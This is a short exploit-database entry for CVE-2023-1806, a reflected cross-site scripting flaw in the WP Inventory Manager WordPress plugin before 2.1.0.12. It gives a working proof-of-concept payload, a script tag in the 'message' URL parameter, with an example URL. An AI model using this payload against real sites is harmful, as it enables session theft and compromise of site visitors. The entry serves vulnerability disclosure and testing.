Exploit for WP Inventory Manager < 2.1.0.12 - Reflected XSS CVE-2023-1806

Name: Exploit for WP Inventory Manager < 2.1.0.12 - Reflected XSS CVE-2023-1806
Rating: 5 (105 reviews)

2023-04-12 | CVSS 6.1

## https://sploitus.com/exploit?id=WPEX-ID:38D99C7D-2D10-4910-B95A-1CB545B813C4
On a page where the [wpinventory] shortcode is embed, append the following payload: message=<script>alert(/XSS/)</script>

For example: https://example.com/inventory?message=<script>alert(/XSS/)</script>